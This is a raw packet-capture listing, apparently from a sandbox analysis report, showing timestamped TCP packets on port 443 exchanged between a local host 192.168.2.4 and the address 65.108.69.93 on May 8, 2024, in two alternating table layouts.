                                                                                                                                                                                                                                May 8, 2024 16:41:15.469949961 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470073938 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470082998 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470083952 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470107079 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470133066 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470139027 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470154047 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470166922 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470196962 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470196962 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470206976 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470216036 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470216990 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470246077 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470277071 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470283031 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470293045 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470293045 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470314026 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470361948 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470361948 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470372915 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470386982 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470428944 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470434904 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470444918 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470458031 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470467091 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470487118 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470494032 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470505953 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470523119 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470524073 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470554113 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470558882 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470568895 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470576048 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470590115 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470621109 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470627069 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470639944 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470650911 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470658064 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470684052 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470690012 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470700026 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470711946 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470731974 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470746040 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470750093 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.470774889 CEST49743443192.168.2.465.108.69.93
Timestamp                             Source Port  Dest Port  Source IP      Dest IP
May 8, 2024 16:41:15.470804930 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.473557949 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.473582029 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.473629951 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.473640919 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.473651886 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.473663092 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.473686934 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.473711014 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.473716021 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.473721981 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.473754883 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.473759890 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.473773956 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.473805904 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.473818064 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.473824978 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.473836899 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.473861933 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.473886967 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.473896980 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.473912001 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.473956108 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.473963022 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.473979950 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.473999023 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474031925 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474037886 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474047899 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474055052 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474062920 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474088907 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474096060 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474129915 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474138021 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474160910 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474195957 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474203110 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474215031 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474378109 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474391937 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474423885 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474431992 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474442005 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474445105 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474467039 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474488974 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474494934 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474513054 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474520922 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474535942 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474566936 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474572897 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474582911 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474591017 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474616051 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474642992 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474648952 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474669933 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474670887 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474687099 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474714994 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474720955 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474735975 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474740982 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474752903 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474787951 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474793911 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474806070 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474811077 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474821091 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474852085 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474859953 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474870920 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474889040 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474889994 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474917889 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474925041 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474939108 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474951982 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474952936 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.474987984 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.474993944 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475004911 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475019932 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.475020885 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475054026 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.475059986 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475069046 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475081921 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475087881 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.475123882 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475127935 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.475135088 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475155115 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475172997 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.475199938 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475203037 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.475210905 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475224972 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475251913 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.475260973 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475272894 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475281954 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.475294113 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.475294113 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475305080 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475327015 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.475347042 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475363970 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.475368977 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475382090 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475399971 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.475418091 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.475434065 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475449085 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475492001 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.475497007 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475506067 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475507975 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.475532055 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475550890 CEST   49743        443        192.168.2.4    65.108.69.93
May 8, 2024 16:41:15.475555897 CEST   443          49743      65.108.69.93   192.168.2.4
May 8, 2024 16:41:15.475565910 CEST   443          49743      65.108.69.93   192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475572109 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475580931 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475610018 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475616932 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475629091 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475636005 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475653887 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475655079 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475663900 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475684881 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475713015 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475720882 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475728989 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475738049 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475756884 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475783110 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475785971 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475795984 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475812912 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475833893 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475841045 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475853920 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475858927 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475872040 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475907087 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475914955 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475924969 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475943089 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475945950 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475977898 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475985050 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475995064 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.475995064 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476011038 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476036072 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476042032 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476061106 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476067066 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476078033 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476093054 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476104021 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476120949 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476144075 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476155043 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476160049 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476169109 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476196051 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476212025 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476216078 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476227045 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476247072 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476273060 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476274967 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476284981 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476296902 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476305008 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476325035 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476331949 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476346970 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476346970 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476372004 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476373911 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476382971 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476423979 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476430893 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476449966 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476464987 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476470947 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476483107 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476500034 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476514101 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476521015 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476531029 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476548910 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476571083 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476578951 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476587057 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476597071 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476614952 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476635933 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476639986 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476650000 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476667881 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476680040 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476685047 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476701975 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476716042 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476732016 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476742029 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476747990 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476758003 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476784945 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476788044 CEST49743443192.168.2.465.108.69.93
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476794958 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476813078 CEST4434974365.108.69.93192.168.2.4
                                                                                                                                                                                                                                May 8, 2024 16:41:15.476833105 CEST49743443192.168.2.465.108.69.93
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
May 8, 2024 16:41:15.476840973 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.476851940 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.476859093 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.476871967 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.476877928 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.476883888 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.476917982 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.476934910 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.476938009 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.476968050 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.476974964 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.476988077 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.476993084 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477003098 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477019072 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477024078 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477054119 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477056026 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477076054 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477082014 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477089882 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477112055 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477124929 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477132082 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477139950 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477149010 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477165937 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477191925 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477195978 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477205992 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477225065 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477252007 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477262974 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477273941 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477281094 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477293015 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477307081 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477313042 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477332115 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477353096 CEST  443          49743      65.108.69.93  192.168.2.4
May 8, 2024 16:41:15.477356911 CEST  49743        443        192.168.2.4   65.108.69.93
May 8, 2024 16:41:15.477390051 CEST  49743        443        192.168.2.4   65.108.69.93
